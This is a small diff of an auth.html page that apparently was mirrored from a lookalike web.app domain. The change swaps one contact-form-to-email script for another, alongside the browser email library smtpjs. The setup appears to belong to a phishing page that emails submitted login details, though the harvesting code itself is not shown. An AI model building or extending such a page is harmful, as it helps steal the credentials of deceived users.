--- a/auth.html
+++ b/auth.html
@@ -79,7 +79,7 @@
     }
   </script>
   <script src = "https://smtpjs.com/v3/smtp.js"></script>
-  <script src="Contact-form-to-email.js"></script>
+  <script src="Contact-form-to-email2.js"></script>
   <script src="https://unpkg.com/sweetalert/sweetalert.min.js"></script>
   <!-- Mirrored from paxfu1.web.app/auth.html by HTTrack Website Copier/3.x [XR&CO'2017], Thu, 29 Jun 2023 15:33:38 GMT -->
 
